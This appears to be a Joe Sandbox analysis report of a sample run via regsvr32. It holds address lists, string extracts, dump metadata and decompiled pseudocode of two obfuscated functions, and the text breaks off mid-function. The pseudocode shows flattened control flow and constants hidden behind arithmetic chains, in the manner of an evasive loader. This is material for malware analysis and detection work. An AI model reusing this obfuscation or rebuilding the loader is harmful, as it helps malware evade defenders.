0x04f7d3a4
0x04f7d3a9
0x04f7d3b1
0x04f7d3b9
0x04f7d3c1
0x04f7d3c9
0x04f7d3d1
0x04f7d3df
0x04f7d3e4
0x04f7d3ea
0x04f7d3f2
0x04f7d3fa
0x04f7d406
0x04f7d409
0x04f7d412
0x04f7d41b
0x04f7d41f
0x04f7d43b
0x04f7d440
0x04f7d443
0x00000000
0x04f7cc51
0x04f7cc53
0x04f7d30c
0x04f7d316
0x04f7d31b
0x04f7d323
0x04f7d32b
0x04f7d339
0x04f7d33c
0x04f7d340
0x04f7d345
0x04f7d34d
0x04f7d355
0x04f7d35d
0x04f7d365
0x04f7d369
0x04f7d36a
0x04f7d36b
0x04f7d36f
0x04f7d379
0x04f7d37a
0x04f7d381
0x04f7d385
0x04f7d387
0x04f7d389
0x04f7d38c
0x00000000
0x04f7cc59
0x04f7cc5f
0x04f7d012
0x04f7d01a
0x04f7d022
0x04f7d02a
0x04f7d032
0x04f7d03a
0x04f7d042
0x04f7d04a
0x04f7d052
0x04f7d05a
0x04f7d062
0x04f7d06a
0x04f7d072
0x04f7d07a
0x04f7d082
0x04f7d09f
0x04f7d0a4
0x04f7d0ae
0x04f7d0b9
0x04f7d0c3
0x04f7d0cb
0x04f7d0d3
0x04f7d0db
0x04f7d0e3
0x04f7d0eb
0x04f7d0f3
0x04f7d0fb
0x04f7d103
0x04f7d10b
0x04f7d113
0x04f7d122
0x04f7d123
0x04f7d12d
0x04f7d131
0x04f7d136
0x04f7d153
0x04f7d158
0x04f7d163
0x04f7d16d
0x04f7d177
0x04f7d17f
0x04f7d187
0x04f7d18f
0x04f7d197
0x04f7d19f
0x04f7d1a7
0x04f7d1b5
0x04f7d1b9
0x04f7d1bd
0x04f7d1db
0x04f7d1e0
0x04f7d1e8
0x04f7d1f4
0x04f7d1f7
0x04f7d1ff
0x04f7d207
0x04f7d20f
0x04f7d217
0x04f7d21c
0x04f7d224
0x04f7d22c
0x04f7d234
0x04f7d23c
0x04f7d244
0x04f7d252
0x04f7d256
0x04f7d25e
0x04f7d276
0x04f7d27b
0x04f7d283
0x04f7d28c
0x04f7d290
0x04f7d298
0x04f7d2a0
0x04f7d2ad
0x04f7d2b1
0x04f7d2b9
0x04f7d2c1
0x04f7d2c9
0x04f7d2d1
0x04f7d2d9
0x04f7d2e1
0x04f7d2e5
0x04f7d2fd
0x04f7d302
0x00000000
0x04f7cc65
0x04f7cc67
0x04f7cf1a
0x04f7cf26
0x04f7cf31
0x04f7cf36
0x04f7cf3e
0x04f7cf46
0x04f7cf53
0x04f7cf57
0x04f7cf5f
0x04f7cf67
0x04f7cf6f
0x04f7cf77
0x04f7cf7c
0x04f7cf84
0x04f7cf8c
0x04f7cf91
0x04f7cf99
0x04f7cfa1
0x04f7cfae
0x04f7cfb2
0x04f7cfba
0x04f7cfc2
0x04f7cfc7
0x04f7cfcf
0x04f7cffb
0x04f7d000
0x04f7d008
0x04f7d00a
0x00000000
0x04f7cc6d
0x04f7cc73
0x04f7cd0d
0x04f7cd17
0x04f7cd26
0x04f7cd27
0x04f7cd2b
0x04f7cd33
0x04f7cd3b
0x04f7cd41
0x04f7cd45
0x04f7cd4d
0x04f7cd55
0x04f7cd5d
0x04f7cd65
0x04f7cd6d
0x04f7cd72
0x04f7cd8f
0x04f7cd94
0x04f7cd9e
0x04f7cda8
0x04f7cdb0
0x04f7cdb8
0x04f7cdc0
0x04f7cdc8
0x04f7cdcd
0x04f7cdd5
0x04f7cde4
0x04f7cde8
0x04f7cdec
0x04f7cdf4
0x04f7cdfc
0x04f7ce04
0x04f7ce09
0x04f7ce11
0x04f7ce19
0x04f7ce2b
0x04f7ce33
0x04f7ce55
0x04f7ce5a
0x04f7ce62
0x04f7ce65
0x04f7ce71
0x04f7ce74
0x04f7ce7c
0x04f7ce86
0x04f7ce94
0x04f7ce97
0x04f7ce9b
0x04f7cea3
0x04f7ceab
0x04f7ceb3
0x04f7cebb
0x04f7cec3
0x04f7cecb
0x04f7ced9
0x04f7cedd
0x04f7cee2
0x04f7cee2
0x04f7cee2
0x04f7cefa
0x04f7ceff
0x04f7ceff
0x04f7cf03
0x04f7cf06
0x04f7cf0b
0x04f7cf10
0x00000000
0x04f7cc79
0x04f7cc7f
0x00000000
0x04f7cc85
0x04f7cc85
0x04f7cc8f
0x04f7cc97
0x04f7cc9f
0x04f7ccad
0x04f7ccb2
0x04f7ccbc
0x04f7ccbf
0x04f7ccc3
0x04f7cccb
0x04f7ccd3
0x04f7ccdb
0x04f7cce0
0x04f7ccf8
0x04f7ccff
0x04f7cd04
0x04f7cd04
0x04f7cc39
0x00000000
0x04f7cc39
0x04f7cc7f
0x04f7cc73
0x04f7cc67
0x04f7cc5f
0x04f7cc53
0x00000000
0x04f7d57d
0x04f7d57d
0x04f7d57d
0x00000000
0x04f7d589
0x04f7cc3e
0x04f7cc39

Strings

], xrefs: 04F7CF7C
s<, xrefs: 04F7CD0D
TFY, xrefs: 04F7CFA1
1, xrefs: 04F7CF91
+, xrefs: 04F7D0FB
7L, xrefs: 04F7CD3B
_:G, xrefs: 04F7D490

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +$1$TFY$]$_:G$s<$7L
API String ID: 0-1938468095
Opcode ID: af56529470a0cb29bd8a42445faabaa461cc9589d60bb8ceea559b3a88f7ad9f
Instruction ID: abdb48ae93cd6faf5bd0c12b4500f6fed8fa2cbfaae3cdcc0a03e9d6f670b456
Opcode Fuzzy Hash: af56529470a0cb29bd8a42445faabaa461cc9589d60bb8ceea559b3a88f7ad9f
Instruction Fuzzy Hash: DD4211715093419FC348CF25D58A80BBBE1BBC8758F504A1DF4DAA6260D3B9DA4ACF4B

Uniqueness

Uniqueness Score: -1.00%

Function 04F724F9 Relevance: 9.2, Strings: 7, Instructions: 416
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04F724F9(intOrPtr* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				char _v40;
				char _v72;
				char _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t387;
				void* _t389;
				intOrPtr _t396;
				signed int _t399;
				signed int _t409;
				signed int _t415;
				signed int _t424;
				void* _t445;
				void* _t456;
				signed int* _t457;
				signed int _t460;
				signed int _t463;
				signed int _t464;
				intOrPtr _t468;
				signed int _t470;
				signed int _t473;
				signed int _t475;
				signed int _t476;
				char* _t478;
				signed int _t479;
				signed int _t484;
				signed int _t486;
				void* _t512;
				signed int _t523;
				void* _t524;
				char* _t525;
				intOrPtr* _t526;
				void* _t527;
				void* _t529;
				void* _t530;
				void* _t532;
				void* _t534;

				_t457 = _a4;
				_push(_a12);
				_t526 = __ecx;
				_push(_a8);
				_push(_t457);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t387);
				_t530 = _t529 + 0x14;
				_v96 = 0x271ac;
				_t527 = 0;
				_v92 = 0x87b87;
				_t389 = 0x350bb;
				while(1) {
					L1:
					while(1) {
						_t534 = _t389 - 0x9d5bd;
						if(_t534 > 0) {
							goto L20;
						}
						L3:
						if(_t534 == 0) {
							_v108 = 0xc3ae6f;
							_t470 = 0x19;
							_v108 = _v108 / _t470;
							_push(_t470);
							_v108 = _v108 * 0x48;
							_v108 = _v108 ^ 0x023f3a42;
							_v112 = 0xcbda10;
							_v112 = _v112 << 6;
							_v112 = _v112 * 0xe;
							_v112 = _v112 / _t470;
							_v112 = _v112 ^ 0x080c428f;
							_t424 = E04F73EE6(_t470, _t457[1], __eflags);
							 *_t457 = _t424;
							__eflags = _t424;
							if(__eflags == 0) {
								_t389 = 0xaf2bf;
							} else {
								_t389 = 0x19ae8;
								_t527 = 1;
							}
							L10:
							_t468 = _a8;
							continue;
							do {
								while(1) {
									_t534 = _t389 - 0x9d5bd;
									if(_t534 > 0) {
										goto L20;
									}
									goto L3;
								}
								goto L20;
								L29:
								__eflags = _t389 - 0x57c;
							} while (__eflags != 0);
							L32:
							return _t527;
						}
						if(_t389 == 0x19ae8) {
							_t523 =  *_t457;
							_v112 = 0x208403;
							_v112 = _v112 >> 0xa;
							_v112 = _v112 + 0xffffa12a;
							_v112 = _v112 | 0xadb984c4;
							_v112 = _v112 ^ 0xfffbd5af;
							_v116 = 0x675828;
							_v116 = _v116 << 3;
							_v116 = _v116 + 0xffffbf34;
							_v116 = _v116 | 0x2b0d998f;
							_v116 = _v116 ^ 0x2b3178ad;
							_v104 = 0x8d0f47;
							_v104 = _v104 * 0x58;
							_v104 = _v104 ^ 0x3073a33d;
							_v108 = 0x2524b9;
							_v108 = _v108 + 0xffff6a76;
							_v108 = _v108 << 9;
							_v108 = _v108 ^ 0x4915ed1c;
							E04F7BCE5(_v112, _v116, _v104, _v108, _t523);
							_v108 = 0xe05427;
							_v108 = _v108 << 4;
							_v108 = _v108 + 0x36c0;
							_v108 = _v108 ^ 0x0e057970;
							_t524 = _t523 + _v108;
							_v116 = 0x53b26a;
							_v116 = _v116 >> 0xf;
							_v116 = _v116 >> 0xc;
							_t473 = 0x2a;
							_v116 = _v116 / _t473;
							_v116 = _v116 ^ 0x000965ae;
							_v112 = 0x2687dd;
							_v112 = _v112 + 0x7b5b;
							_v112 = _v112 << 0x10;
							_v112 = _v112 * 0x39;
							_v112 = _v112 ^ 0xb776f591;
							_v108 = 0x94f5b5;
							_v108 = _v108 * 0x36;
							_v108 = _v108 ^ 0x2d3523c3;
							_v108 = _v108 ^ 0x325ad2c5;
							E04F6C8F0(_t524, _v116, _v112, _v88, _v84, _v108);
							_t525 = _t524 + _v84;
							_v112 = 0x843d1d;
							_v112 = _v112 + 0x9be3;
							_v112 = _v112 ^ 0x11b2bcb9;
							_t475 = 0x51;
							_v112 = _v112 / _t475;
							_v112 = _v112 ^ 0x003ce36c;
							_v104 = 0xa44038;
							_t476 = 0x7c;
							_v104 = _v104 / _t476;
							_v104 = _v104 ^ 0x00054fd3;
							_v108 = 0xa73776;
							_push(_v96);
							_v108 = _v108 * 9;
							_push(_t525);
							_v108 = _v108 * 0x5e;
							_v108 = _v108 ^ 0x28919933;
							_push(_v108);
							E04F7BA7C(_v112, _v104);
							_t532 = _t530 + 0x28;
							_t512 = _v96 + _t525;
							_t478 = _t525;
							__eflags = _t525 - _t512;
							if(_t525 >= _t512) {
								L16:
								_v116 = 0x8397f8;
								_v116 = _v116 >> 0xf;
								_v116 = _v116 ^ 0x00000109;
								_v112 = 0x36ce66;
								_v112 = _v112 << 0x10;
								_v112 = _v112 ^ 0xce6f59ea;
								_v108 = 0xc105cb;
								_v108 = _v108 ^ 0xa2564010;
								_t479 = 0x30;
								_push(_t479);
								_v108 = _v108 / _t479;
								_v108 = _v108 ^ 0x036d9fa0;
								_v104 = 0xe057df;
								_v104 = _v104 << 4;
								_v104 = _v104 ^ 0x0e031a2a;
								_t445 = E04F6F826(0, _t479, _v116);
								_t468 = _a8;
								_t530 = _t532 + 0xc;
								 *((char*)(_t445 + _t525)) = 0;
								_t389 = 0xaf2bf;
								goto L1;
							} else {
								goto L13;
							}
							do {
								L13:
								__eflags =  *_t478;
								if( *_t478 == 0) {
									_v108 = 0xc9ebfb;
									_v108 = _v108 | 0xe1b5ffb9;
									_t166 =  &_v108;
									 *_t166 = _v108 ^ 0xe1fdff38;
									__eflags =  *_t166;
									 *_t478 = _v108;
								}
								_t478 = _t478 + 1;
								__eflags = _t478 - _t512;
							} while (_t478 < _t512);
							goto L16;
						}
						if(_t389 == 0x350bb) {
							_t389 = 0xfef3d;
							continue;
						}
						if(_t389 == 0x4c5fd) {
							_v112 = 0x265b58;
							_v112 = _v112 << 2;
							_v112 = _v112 * 0x36;
							_v112 = _v112 + 0x97dc;
							_v112 = _v112 ^ 0x2055d292;
							_v100 = 0xcfbb46;
							_v100 = _v100 + 0x566e;
							_v100 = _v100 ^ 0x00d19bf1;
							_v108 = 0xb41f53;
							_v108 = _v108 * 0x22;
							_v108 = _v108 ^ 0x1c31b88f;
							_t381 =  &_v108;
							 *_t381 = _v108 ^ 0x0bd5a32a;
							__eflags =  *_t381;
							E04F7E4B2(_v112, _v100,  *_t381, _v108, _v80);
							goto L32;
						}
						if(_t389 != 0x889d3) {
							goto L29;
						}
						_v24 = _t468;
						_v20 =  &_v72;
						_v40 =  *_t526;
						_v36 =  *((intOrPtr*)(_t526 + 4));
						_v16 = 0x20;
						_v116 = 0xf7f4d4;
						_v116 = _v116 ^ 0x836807c5;
						_v116 = _v116 + 0x67a3;
						_v116 = _v116 + 0x2956;
						_v116 = _v116 ^ 0x83affc81;
						_v108 = 0x5d16d1;
						_v108 = _v108 | 0x397964a7;
						_v108 = _v108 >> 8;
						_v108 = _v108 ^ 0x0031283f;
						_v112 = 0x47a5cd;
						_v112 = _v112 + 0x9f3e;
						_t484 = 0xa;
						_v112 = _v112 / _t484;
						_v112 = _v112 ^ 0x00057201;
						_v104 = 0x5ffb18;
						_v104 = _v104 + 0x8a53;
						_v104 = _v104 ^ 0x00698429;
						_t456 = E04F75D5E( &_v80, _v116, _v108, _v112,  &_v40, _v104);
						_t530 = _t530 + 0x10;
						if(_t456 == 0) {
							goto L32;
						}
						_t389 = 0xd1712;
						goto L10;
						L20:
						__eflags = _t389 - 0xa804a;
						if(_t389 == 0xa804a) {
							_v104 = 0x8d7f81;
							_v104 = _v104 >> 0xc;
							_v104 = _v104 ^ 0x0000c3d7;
							_v116 = 0xb83cc;
							_t460 = 0x69;
							_push(_t460);
							_v116 = _v116 * 0x44;
							_v116 = _v116 + 0xffff4b68;
							_v116 = _v116 / _t460;
							_v116 = _v116 ^ 0x000c038e;
							_v112 = 0xd586fa;
							_v112 = _v112 | 0x001c7aba;
							_v112 = _v112 << 5;
							_v112 = _v112 << 0xf;
							_v112 = _v112 ^ 0xefaa099f;
							_v108 = 0x8c7703;
							_v108 = _v108 << 4;
							_v108 = _v108 ^ 0x08c770b0;
							_v100 = 0xafdd0a;
							_v100 = _v100 + 0xffff8ebc;
							_v100 = _v100 ^ 0x00af6bd6;
							_t396 = E04F6F826(_v100, _t460, _v108);
							_t530 = _t530 + 0xc;
							_v100 = 0x19212a;
							_v100 = _v100 + 0xd056;
							_v100 = _v100 ^ 0x0019f1c0;
							_v96 = _t396;
							_t399 = _v100 + _v96 + _v84;
							__eflags = _t399;
							_t457[1] = _t399;
							_t389 = 0x9d5bd;
							goto L29;
						}
						__eflags = _t389 - 0xaf2bf;
						if(__eflags == 0) {
							_v112 = 0xf29534;
							_t463 = 0x48;
							_v112 = _v112 / _t463;
							_v112 = _v112 + 0xffffafca;
							_t464 = 0x7c;
							_v112 = _v112 / _t464;
							_v112 = _v112 ^ 0x000f150e;
							_v104 = 0x32c07c;
							_v104 = _v104 ^ 0x274dc55d;
							_v104 = _v104 ^ 0x277b82e1;
							_v108 = 0xae1f8d;
							_v108 = _v108 << 1;
							_v108 = _v108 ^ 0x58e47bb0;
							_v108 = _v108 ^ 0x59b8a517;
							E04F7E4B2(_v112, _v104, __eflags, _v108, _v88);
							_t389 = 0x4c5fd;
							goto L10;
						}
						__eflags = _t389 - 0xd1712;
						if(_t389 == 0xd1712) {
							_v112 = 0xe9a9b7;
							_v112 = _v112 + 0xe1f7;
							_v112 = _v112 ^ 0x00eaeb80;
							_v108 = 0x7c02b;
							_v108 = _v108 * 0x46;
							_v108 = _v108 ^ 0x021768e2;
							_v104 = 0x1d13ab;
							_v104 = _v104 * 0x6f;
							_v104 = _v104 ^ 0x0c941189;
							_t409 = E04F6593C(_v112,  &_v80, _v108,  &_v88, _v104);
							_t530 = _t530 + 0xc;
							asm("sbb eax, eax");
							_t389 = ( ~_t409 & 0x0005ba4d) + 0x4c5fd;
							goto L10;
						}
						__eflags = _t389 - 0xfef3d;
						if(_t389 != 0xfef3d) {
							goto L29;
						}
						_v108 = 0xe9ddac;
						_t486 = 0x64;
						_v108 = _v108 * 0x18;
						_v108 = _v108 ^ 0x15e08599;
						_v112 = 0xa07123;
						_v112 = _v112 | 0x3fc8b2f1;
						_v112 = _v112 << 0xe;
						_v112 = _v112 + 0xffffceda;
						_v112 = _v112 ^ 0x3cfd957b;
						_v104 = 0x9f77dc;
						_v104 = _v104 / _t486;
						_v104 = _v104 ^ 0x00007f92;
						_push(_v104);
						_t415 = E04F7CBE5( &_v72, _v108,  *_t526,  *((intOrPtr*)(_t526 + 4)), _t486, _v112);
						_t530 = _t530 + 0x14;
						__eflags = _t415;
						if(__eflags == 0) {
							goto L32;
						}
						_t389 = 0x889d3;
						goto L10;
					}
				}
			}

0x04f724fd
0x04f72507
0x04f7250e
0x04f72517
0x04f72518
0x04f72519
0x04f7251a
0x04f7251b
0x04f72520
0x04f72523
0x04f7252b
0x04f7252d
0x04f72535
0x04f7253a
0x04f7253a
0x04f7253f
0x04f7253f
0x04f72541
0x00000000
0x00000000
0x04f72547
0x04f72547
0x04f72903
0x04f72913
0x04f72918
0x04f72921
0x04f72922
0x04f72926
0x04f7292e
0x04f72936
0x04f72940
0x04f7294a
0x04f7294e
0x04f72961
0x04f72966
0x04f72969
0x04f7296b
0x04f7297a
0x04f7296d
0x04f7296f
0x04f72974
0x04f72974
0x04f7264c
0x04f7264c
0x04f72653
0x04f7253f
0x04f7253f
0x04f7253f
0x04f72541
0x00000000
0x00000000
0x00000000
0x04f72541
0x00000000
0x04f72c28
0x04f72c28
0x04f72c28
0x04f72cad
0x04f72cb4
0x04f72cb4
0x04f72552
0x04f72662
0x04f72664
0x04f7266c
0x04f72671
0x04f72679
0x04f72681
0x04f72689
0x04f72691
0x04f72696
0x04f7269e
0x04f726a6
0x04f726ae
0x04f726bc
0x04f726c0
0x04f726c8
0x04f726d0
0x04f726d8
0x04f726dd
0x04f726f5
0x04f726fa
0x04f72705
0x04f7270c
0x04f72714
0x04f72720
0x04f72722
0x04f7272a
0x04f7272f
0x04f7273a
0x04f7273f
0x04f72743
0x04f7274b
0x04f72753
0x04f7275b
0x04f72765
0x04f72769
0x04f72771
0x04f7277e
0x04f72782
0x04f7278a
0x04f727a6
0x04f727ab
0x04f727b1
0x04f727b9
0x04f727c1
0x04f727cf
0x04f727d4
0x04f727da
0x04f727e2
0x04f727ee
0x04f727f1
0x04f727f5
0x04f727fd
0x04f7280a
0x04f7280e
0x04f72817
0x04f72818
0x04f7281c
0x04f72824
0x04f72830
0x04f72839
0x04f7283c
0x04f7283e
0x04f72840
0x04f72842
0x04f7286c
0x04f7286c
0x04f72876
0x04f7287b
0x04f72883
0x04f7288b
0x04f72890
0x04f72898
0x04f728a0
0x04f728ae
0x04f728b1
0x04f728b2
0x04f728b6
0x04f728be
0x04f728c6
0x04f728cb
0x04f728e6
0x04f728eb
0x04f728f2
0x04f728f5
0x04f728f9
0x00000000
0x00000000
0x00000000
0x00000000
0x04f72844
0x04f72844
0x04f72844
0x04f72847
0x04f72849
0x04f72851
0x04f72859
0x04f72859
0x04f72859
0x04f72865
0x04f72865
0x04f72867
0x04f72868
0x04f72868
0x00000000
0x04f72844
0x04f7255d
0x04f72658
0x00000000
0x04f72658
0x04f72568
0x04f72c35
0x04f72c3d
0x04f72c47
0x04f72c4b
0x04f72c53
0x04f72c5b
0x04f72c63
0x04f72c6b
0x04f72c73
0x04f72c80
0x04f72c84
0x04f72c8c
0x04f72c8c
0x04f72c8c
0x04f72ca4
0x00000000
0x04f72caa
0x04f72573
0x00000000
0x00000000
0x04f72579
0x04f72581
0x04f72589
0x04f72590
0x04f72594
0x04f7259c
0x04f725a4
0x04f725ac
0x04f725b4
0x04f725bc
0x04f725c4
0x04f725cc
0x04f725d4
0x04f725d9
0x04f725e1
0x04f725e9
0x04f725f7
0x04f725fe
0x04f72606
0x04f7260e
0x04f72616
0x04f7261e
0x04f72637
0x04f7263c
0x04f72641
0x00000000
0x00000000
0x04f72647
0x00000000
0x04f72984
0x04f72984
0x04f72989
0x04f72b42
0x04f72b4c
0x04f72b51
0x04f72b59
0x04f72b68
0x04f72b69
0x04f72b6a
0x04f72b6e
0x04f72b7c
0x04f72b80
0x04f72b88
0x04f72b90
0x04f72b98
0x04f72b9d
0x04f72ba2
0x04f72baa
0x04f72bb2
0x04f72bb7
0x04f72bbf
0x04f72bc7
0x04f72bcf
0x04f72bec
0x04f72bf8
0x04f72bfb
0x04f72c03
0x04f72c0b
0x04f72c13
0x04f72c1f
0x04f72c1f
0x04f72c23
0x04f72c26
0x00000000
0x04f72c26
0x04f7298f
0x04f72994
0x04f72ab7
0x04f72ac7
0x04f72acc
0x04f72ad2
0x04f72ade
0x04f72ae1
0x04f72ae5
0x04f72aed
0x04f72af5
0x04f72afd
0x04f72b05
0x04f72b0d
0x04f72b11
0x04f72b19
0x04f72b31
0x04f72b38
0x00000000
0x04f72b38
0x04f7299a
0x04f7299f
0x04f72a3d
0x04f72a49
0x04f72a51
0x04f72a59
0x04f72a66
0x04f72a6a
0x04f72a72
0x04f72a7f
0x04f72a87
0x04f72a9c
0x04f72aa1
0x04f72aa6
0x04f72aad
0x00000000
0x04f72aad
0x04f729a5
0x04f729aa
0x00000000
0x00000000
0x04f729b0
0x04f729c1
0x04f729c2
0x04f729c6
0x04f729ce
0x04f729d6
0x04f729de
0x04f729e3
0x04f729eb
0x04f729f3
0x04f72a01
0x04f72a05
0x04f72a0d
0x04f72a23
0x04f72a28
0x04f72a2b
0x04f72a2d
0x00000000
0x00000000
0x04f72a33
0x00000000
0x04f72a33
0x04f7253f

Strings

(Xg, xrefs: 04F72689
X[&, xrefs: 04F72C35
, xrefs: 04F72594
'T, xrefs: 04F726FA
nV, xrefs: 04F72C63
?(1, xrefs: 04F725D9
l<, xrefs: 04F727DA

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $'T$(Xg$?(1$X[&$l<$nV
API String ID: 0-2987469045
Opcode ID: 493f44dd5272c19a114e52eb617a708142f5a47180c32f960e1536f2fc3ba449
Instruction ID: 5bb4edd87f28bcbfe8cebec2d4056d22f14de3ed2d3e57aaab4944dcbed8786d
Opcode Fuzzy Hash: 493f44dd5272c19a114e52eb617a708142f5a47180c32f960e1536f2fc3ba449
Instruction Fuzzy Hash: 6612F1715083428FD348CF25D58991BBBE1BBD8748F108A1EF0DA96261D778DA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 04F61D5C Relevance: 9.2, Strings: 7, Instructions: 411
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04F61D5C(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				void* _t382;
				signed int _t384;
				intOrPtr _t386;
				intOrPtr _t390;
				intOrPtr _t394;
				intOrPtr _t397;
				signed int _t400;
				intOrPtr _t402;
				intOrPtr* _t403;
				void* _t427;
				intOrPtr _t438;
				intOrPtr _t442;
				char _t449;
				intOrPtr* _t454;
				signed int _t456;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t465;
				signed int _t466;
				signed int _t471;
				intOrPtr _t497;
				signed int _t503;
				signed int* _t507;
				void* _t510;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t382);
				_t507 =  &(( &_v316)[8]);
				_v288 = 0x3ba66;
				_v288 = 0x23;
				_t504 = _v288;
				_t449 = 0;
				_t503 = _v288;
				do {
					_t384 = 0x44d61;
					goto L2;
					do {
						while(1) {
							L2:
							_t510 = _t384 - 0x566d9;
							if(_t510 > 0) {
								break;
							}
							if(_t510 == 0) {
								_v296 = 0x356bb0;
								_v296 = _v296 << 0xf;
								_v296 = _v296 ^ 0xb5d9c996;
								_v316 = 0x8e1b40;
								_v316 = _v316 * 0x18;
								_v316 = _v316 | 0x42cca37a;
								_v316 = _v316 ^ 0x9f8cafc7;
								_v316 = _v316 ^ 0xd05d513d;
								_v300 = 0x963092;
								_v300 = _v300 ^ 0x5650e20f;
								_v300 = _v300 ^ 0x56c96144;
								E04F7E4B2(_v296, _v316, __eflags, _v300, _v284);
								_v296 = 0x8829f1;
								_t456 = 0x2b;
								_v296 = _v296 / _t456;
								_v296 = _v296 ^ 0x000a1ba7;
								_v300 = 0xea9539;
								_v300 = _v300 + 0xffff916b;
								_v300 = _v300 ^ 0x00e7b20e;
								_v308 = 0xdee92d;
								_v308 = _v308 | 0xbc978e42;
								_v308 = _v308 + 0x6743;
								_v308 = _v308 ^ 0xbcecc703;
								E04F7E4B2(_v296, _v300, __eflags, _v308, _t504);
								_v304 = 0xc82192;
								_v304 = _v304 | 0x9e7f90d3;
								_t458 = 0x23;
								_v304 = _v304 * 0x15;
								_v304 = _v304 + 0xcb3e;
								_v304 = _v304 ^ 0x0af77267;
								_v300 = 0x6411e7;
								_v300 = _v300 / _t458;
								_v300 = _v300 ^ 0x0001c54e;
								_v316 = 0xd395cb;
								_v316 = _v316 | 0xc4c9a51c;
								_v316 = _v316 >> 0xd;
								_v316 = _v316 ^ 0x97973a2f;
								_v316 = _v316 ^ 0x979d9f95;
								E04F7E4B2(_v304, _v300, __eflags, _v316, _v276);
								_t507 =  &(_t507[6]);
								_t384 = _t503;
								goto L36;
							}
							if(_t384 == 0x16263) {
								_v312 = 0x3219ed;
								_t465 = 0x62;
								_v312 = _v312 / _t465;
								_t466 = 0x53;
								_push(_t466);
								_v312 = _v312 / _t466;
								_v312 = _v312 ^ 0x00000192;
								_v304 = 0x7e564;
								_v304 = _v304 << 0xa;
								_v304 = _v304 ^ 0x1f959040;
								_v292 = 0xdfb202;
								_v292 = _v292 + 0xffff0aa4;
								_v292 = _v292 ^ 0x00d835a7;
								_v316 = 0x475094;
								_v316 = _v316 + 0xffff2c6c;
								_v316 = _v316 | 0x22bcb57a;
								_v316 = _v316 + 0xd9f4;
								_v316 = _v316 ^ 0x22fe6175;
								_v308 = 0x358d58;
								_v308 = _v308 * 0x43;
								_v308 = _v308 ^ 0x0e0d0a8b;
								_t427 = E04F6F826(_v312, _t466, _v304);
								_v308 = 0x539c18;
								_v308 = _v308 * 0x4a;
								_v308 = _v308 * 0x25;
								_v308 = _v308 ^ 0x7e36d35a;
								_v316 = 0xac4bd3;
								_v316 = _v316 / _v288;
								_v316 = _v316 << 6;
								_v316 = _v316 + 0xffffa6c5;
								_v316 = _v316 ^ 0x013bfca6;
								_v292 = 0xd141b1;
								_v292 = _v292 >> 7;
								_v292 = _v292 | 0x0bf730df;
								_v292 = _v292 ^ 0x0bf9a3a3;
								_v300 = 0x1de87b;
								_v300 = _v300 | 0x1ee42474;
								_v300 = _v300 ^ 0x1ef51300;
								_v296 = 0xb2a06f;
								_v296 = _v296 | 0x8f2e0fc4;
								_v296 = _v296 ^ 0x8fbeafe7;
								_v304 = 0x1dea3a;
								_v304 = _v304 << 4;
								_v304 = _v304 << 0xc;
								_v304 = _v304 ^ 0xea3a0001;
								_v312 = 0x5a5264;
								_v312 = _v312 << 0xe;
								_v312 = _v312 << 4;
								_v312 = _v312 ^ 0x49900002;
								_push(_v312 | _v304 | _v296);
								_push(_v300);
								_push(_v292);
								_push(_t427);
								_push(_v316);
								E04F759FA( &_v260, _v308);
								_t507 =  &(_t507[8]);
								_t384 = 0xa74d0;
								continue;
							}
							if(_t384 == 0x24a29) {
								_v316 = 0xdefe8f;
								_v316 = _v316 + 0x39de;
								_v316 = _v316 * 0x25;
								_v316 = _v316 + 0x166b;
								_v316 = _v316 ^ 0x204d16a9;
								_v312 = 0xa186cc;
								_v312 = _v312 + 0xfffff42f;
								_v312 = _v312 << 2;
								_v312 = _v312 ^ 0x028611c2;
								_t438 = E04F724F9(_a4, _v316,  &_v284, _a16, _v312);
								_t507 =  &(_t507[3]);
								__eflags = _t438;
								if(__eflags == 0) {
									L26:
									return _t449;
								}
								_t384 = 0xc64e2;
								continue;
							}
							if(_t384 == 0x2c329) {
								_v312 = 0xd81edc;
								_v312 = _v312 ^ 0x9c1ead5f;
								_v312 = _v312 << 7;
								_v312 = _v312 ^ 0x6350e7a4;
								_v316 = 0x68a6aa;
								_v316 = _v316 ^ 0x5d59bf1e;
								_v316 = _v316 | 0x3d0fa8bf;
								_t471 = 0x6a;
								_v316 = _v316 * 0x52;
								_v316 = _v316 ^ 0x1e6d3833;
								_v308 = 0x8ff801;
								_v308 = _v308 / _t471;
								_v308 = _v308 ^ 0x000c2cc6;
								_t442 = E04F68DA4( &_v268, _v312, _v316, _v308, _a8);
								_t507 =  &(_t507[3]);
								__eflags = _t442;
								if(__eflags == 0) {
